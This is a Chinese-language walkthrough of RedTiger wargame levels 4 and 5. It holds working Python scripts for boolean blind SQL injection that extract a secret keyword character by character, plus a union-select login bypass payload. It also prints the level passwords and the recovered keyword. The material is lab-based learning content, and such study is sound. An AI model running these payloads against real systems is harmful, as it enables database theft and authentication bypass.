level4
简单测试,id存在注入点,id=1 and 1=1通过,判断是布尔。
根据Query returned 0 rows. 或Query return 1 rows.进行盲注。
id=1 and 1=(select length(keyword)=21 from level4_secret) 字段长度为21。
这个地方,猜一下数,一般不会太长,也可以爆破一下(不太会写,随便看看)
import requests
import re
url = 'http://redtiger.labs.overthewire.org/level4.php?'
data1 = 'id=1 and 1=(select length(keyword)='
data2 = ' from level4_secret)'
num = 1
headers = {
'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
"level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
"level3login": "feed_the_cat_who_eats_your_bread",
"level4login": "put_the_kitten_on_your_head"
}
while num < 100:
dataNew = url + data1 + str(num) + data2
response = requests.get(url=dataNew, headers=headers, cookies=cookies)
if re.findall('Query returned 1 rows', response.text):
print(num)
exit(0)
num = num + 1
接下来必须爆破了,写个循环
import requests
import re
url = 'http://redtiger.labs.overthewire.org/level4.php?'
data = 'id=1 and (1=(ascii(substr((select keyword from level4_secret limit 1),{0},1))={1}))'
headers = {
'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
"level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
"level3login": "feed_the_cat_who_eats_your_bread",
"level4login": "put_the_kitten_on_your_head"
}
url = url + data
keyword = ""
for i in range(1, 22):
for c in range(1, 127):
urls = url.format(i, c)
response = requests.get(url=urls, headers=headers, cookies=cookies)
if re.findall('Query returned 1 rows.', response.text):
print(i, c)
keyword = keyword + chr(c)
break
print(keyword)
运行是真的慢,大佬们有没有提速方法?
killstickswithbr1cks!
level5
使用' union select 1,2,...可以试出只有两个字段
username=' union select 1,md5(1)#构建自己的用户名和md5密码,password=1可通过